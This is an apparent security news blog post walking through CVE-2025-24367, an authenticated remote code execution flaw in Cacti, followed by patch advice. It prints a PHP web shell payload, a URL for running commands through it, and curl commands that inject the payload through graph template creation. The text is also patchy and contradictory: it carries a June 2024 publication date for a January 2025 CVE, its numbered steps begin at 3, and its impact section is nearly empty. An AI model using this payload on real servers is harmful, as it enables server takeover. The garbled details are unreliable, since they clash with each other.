CVE CyberSecurity Database News

CVE-2025-24367 - How Authenticated Cacti Users Could Take Over Servers (RCE Exploit Deep Dive)

Poster -

Published: June 2024 <br>By: Security Research Team


Cacti has long been trusted by sysadmins and network engineers as an open-source performance monitoring framework. But a major vulnerability, CVE-2025-24367, could've let attackers who log in as regular Cacti users go far beyond their privileges: with a little crafty manipulation, they could plant malicious PHP scripts on the server and run them. This is what's typically called Remote Code Execution (RCE) — one of the most severe attack vectors.

This post breaks down how CVE-2025-24367 worked, lets you peek at code snippets involved, and shows how a simple in-app action created a full server takeover scenario. Even if you’re not a code wizard, this breakdown is for you.

What’s the Impact?

- Product: Cacti (up to version 1.2.28)

Exploit Overview

Cacti lets users create custom graphs and templates, which involves saving user inputs and generating PHP files. Unfortunately, this design allowed an attacker to inject PHP code via certain fields, causing Cacti to unwittingly write rogue files into its own web directory. Once in place, these files could be accessed via the browser and execute attacker-controlled PHP code.

Abuse Graph Template Creation: Add PHP payload within particular parameters.

3. Force Cacti to Write PHP to Web Root: The system saves user-supplied information, including any PHP code, to a file inside the web root.

Code Snippet: Proof-of-Concept (PoC) Payload

Imagine you’re an attacker who already has a user account on a vulnerable Cacti installation.

Let’s say you’re creating a new “Graph Template” and injecting the following PHP payload into the template title field:

<?php echo shell_exec($_GET['cmd']); ?>

When Cacti saves the graph template, this payload ends up inside a newly created PHP file (e.g., /cacti/scripts/malicious.php). If you then visit:

http://your.cacti.server/scripts/malicious.php?cmd=whoami

You’d see the result of whoami — the username under which the web server is running. You can run any other system command by changing the URL parameter.

Example Request (cURL)

curl -u user:password "http://your.cacti.server/login.php";
# ... (obtain session cookie, as described in detailed PoC)
curl -b cookie.txt -F "template_title=<?php echo shell_exec(\$_GET['cmd']); ?>" \
     "http://your.cacti.server/graph_templates.php?action=create";

This is a simplification; in practice, you’d automate the login, session, and post. See more technical PoCs in Cacti’s GitHub issue tracker and the official CVE entry.

Why Did This Happen?

- No Proper Input Filtering: User-supplied fields were saved directly into PHP files without sanitizing.
- Write Permissions: Cacti’s graph/template system saves files into directories that serve PHP scripts.

What’s the Fix?

Cacti patched this flaw in 1.2.29 by tightening what users can enter and preventing arbitrary code from ending up in web-accessible files.

If you're running Cacti

- Update right now to v1.2.29
- Remove any suspicious files in your /scripts/, /templates/, and main web directories.

References & Further Reading

- Cacti Security Advisory (GitHub)
- NIST NVD Entry: CVE-2025-24367
- Cacti Official Download and Release Notes

Final Thoughts

This vulnerability highlights why even authenticated user actions need careful controls. If you use Cacti, upgrade immediately to stay safe. If you manage other open-source tools, consider this a warning: all user inputs are dangerous until proven otherwise.

Questions or want help securing your Cacti install? Drop us a comment below!

*If this post was useful, share it with your sysadmin friends and colleagues!*

Timeline

Published on: 01/27/2025 18:15:42 UTC
Last modified on: 04/18/2025 02:22:25 UTC